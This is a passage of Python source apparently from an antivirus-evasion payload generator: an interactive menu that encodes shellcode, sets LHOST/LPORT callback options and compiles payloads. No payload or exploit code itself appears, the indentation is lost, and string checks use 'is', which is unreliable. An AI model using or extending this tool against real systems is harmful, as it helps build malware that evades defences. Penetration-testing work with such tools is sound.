for loaded_encoder in self.active_encoders.values():
if self.command_options.encoder.lower() == loaded_encoder.cli_name:
encoder_found_here = True
loaded_encoder.cli_encode(payload)
if not encoder_found_here:
print(helpers.color(" [!] ERROR: Encoder you specified was not found!", warning=True))
print(helpers.color("[*] Try again?", warning=True))
sys.exit()
self.final_shellcode = payload.customized_shellcode
if invoked:
pass
else:
payload.payload_stats()
return
def use_payload(self, selected_payload):
# Tab completion, thanks Will :)
comp = completer.PayloadCompleter(self.payload_option_commands, selected_payload)
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
self.display_payload_options(selected_payload)
payload_options_cmd = ""
evasion_helpers.print_dict_message(self.payload_option_commands, show_title=False)
while True:
payload_options_cmd = input("\n[" + selected_payload.path + ">>] ").strip()
if payload_options_cmd.lower() == "back" or payload_options_cmd.lower() == "main":
payload_options_cmd = ""
break
elif payload_options_cmd.lower() == "generate":
# Add in function to validate all commands are entered
selected_payload.generate()
if not outfile.compiler(selected_payload):
payload_options_cmd = ""
else:
payload_options_cmd = ""
break
elif payload_options_cmd.lower() == "exit":
sys.exit(0)
elif payload_options_cmd.lower() == "help" or payload_options_cmd.lower() == "options":
self.print_options_screen(selected_payload)
evasion_helpers.print_dict_message(self.payload_option_commands, show_title=False)
payload_options_cmd = ""
elif payload_options_cmd.lower().startswith("set"):
if len(payload_options_cmd.split()) == 3:
set_command, key, value = payload_options_cmd.split()
# Make sure it is uppercase
key = key.upper()
if key in selected_payload.required_options:
# Validate LHOST value
if key is "LHOST":
if helpers.validate_ip(value):
selected_payload.required_options[key][0] = value
else:
print()
print(helpers.color("[*] Error: You did not provide a valid IP!", warning=True))
print()
payload_options_cmd = ''
# Validate LPORT
elif key is "LPORT":
if helpers.validate_port(value):
selected_payload.required_options[key][0] = value
else:
print()
print(helpers.color("[*] Error: You did not provide a valid port number!", warning=True))
print()
payload_options_cmd = ''
else:
# Set other options
selected_payload.required_options[key][0] = value
else:
print()
print(helpers.color("[*] Error: You did not provide a valid option!", warning=True))
print(helpers.color("[*] Ex: set LHOST 8.8.8.8", warning=True))
print()
else:
print()
print(helpers.color("[*] Error: You did not provide a valid amount of arguments!", warning=True))
print(helpers.color("[*] Ex: set DOMAIN christest.com", warning=True))
print()
payload_options_cmd = ''
else:
# Not a real command
evasion_helpers.print_dict_message(self.payload_option_commands)
payload_options_cmd = ""
return
